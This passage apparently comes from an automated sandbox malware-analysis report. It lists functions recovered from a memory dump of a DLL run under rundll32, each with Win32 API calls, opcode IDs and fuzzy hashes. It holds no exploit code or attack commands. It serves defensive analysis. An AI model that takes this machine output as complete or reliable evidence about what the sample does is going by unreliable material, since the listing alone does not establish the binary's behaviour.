                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4021759052-0
                                                                                                                      • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                      • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002D5FF
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                        • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString$H_prolog3_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842698744-0
                                                                                                                      • Opcode ID: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction ID: 1a39fa9d0276ee84c07bd3808c66cb0226ddbd666de5b2da3b26845cb98b16c2
                                                                                                                      • Opcode Fuzzy Hash: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction Fuzzy Hash: 2A414A34900204CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                        • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                        • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                        • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                      • SendMessageA.USER32 ref: 10016A5B
                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1877664794-0
                                                                                                                      • Opcode ID: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction ID: 27039e4540ef9999db1a35b9c590bf271b8d22289eaaf12d3c9627bdabeff3d4
                                                                                                                      • Opcode Fuzzy Hash: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction Fuzzy Hash: CE416A72A00258DBEB30CFA4CC81BDE77A8EF09350F614119E949EB281EB70D9848F52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                      • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                      • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                      • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 670545878-0
                                                                                                                      • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                      • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                      • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                      • GetWindowRect.USER32 ref: 1002059C
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                      • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1315500227-0
                                                                                                                      • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                      • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset
                                                                                                                      • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                      • API String ID: 2102423945-4122032997
                                                                                                                      • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                      • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 1529587224-3470857405
                                                                                                                      • Opcode ID: 4417374c3a9af998ac59b3fd5f055eb156b99ac3cd6379673959887b61f9b9dc
                                                                                                                      • Instruction ID: 76e901679f7557a4ddbab0066ed26c1097b584537e780c29b8b672eedf99bc1e
                                                                                                                      • Opcode Fuzzy Hash: 4417374c3a9af998ac59b3fd5f055eb156b99ac3cd6379673959887b61f9b9dc
                                                                                                                      • Instruction Fuzzy Hash: CC41C275D00215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                      • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                      • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                      • API String ID: 2418878492-2500072749
                                                                                                                      • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                      • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                      • _memset.LIBCMT ref: 1001579D
                                                                                                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                      • LoadBitmapA.USER32 ref: 10015807
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4271682439-3916222277
                                                                                                                      • Opcode ID: c2f9d16966c3e05c0f00d4b6f85f81d85042d6ca8df7dc6027e25f19a9a67901
                                                                                                                      • Instruction ID: 5c54a231f9e9e48bd6b355c1aaa1100c674665813244494f34750a8ed28325e6
                                                                                                                      • Opcode Fuzzy Hash: c2f9d16966c3e05c0f00d4b6f85f81d85042d6ca8df7dc6027e25f19a9a67901
                                                                                                                      • Instruction Fuzzy Hash: 1B31C072A00216DFEB10CF78DDCAAAE7BA5EB44645F15052AE506EF2C1EA31E9448750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                      • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                      • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2429671754-3916222277
                                                                                                                      • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                      • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                      • String ID: B$DISPLAY
                                                                                                                      • API String ID: 3136151823-3316187204
                                                                                                                      • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                      • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Edit
                                                                                                                      • API String ID: 0-554135844
                                                                                                                      • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                      • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                      • SendMessageA.USER32 ref: 10023CD9
                                                                                                                      • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                      • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                      • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 187318432-0
                                                                                                                      • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                      • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 69039007-0
                                                                                                                      • Opcode ID: 085ceebb537b79095729454c239c812d1055ab42ca5db445185b2e3eb14481ee
                                                                                                                      • Instruction ID: a0330575091f1317eb55619662e3d715b8734a83444e0781f194cac9bf36f8e0
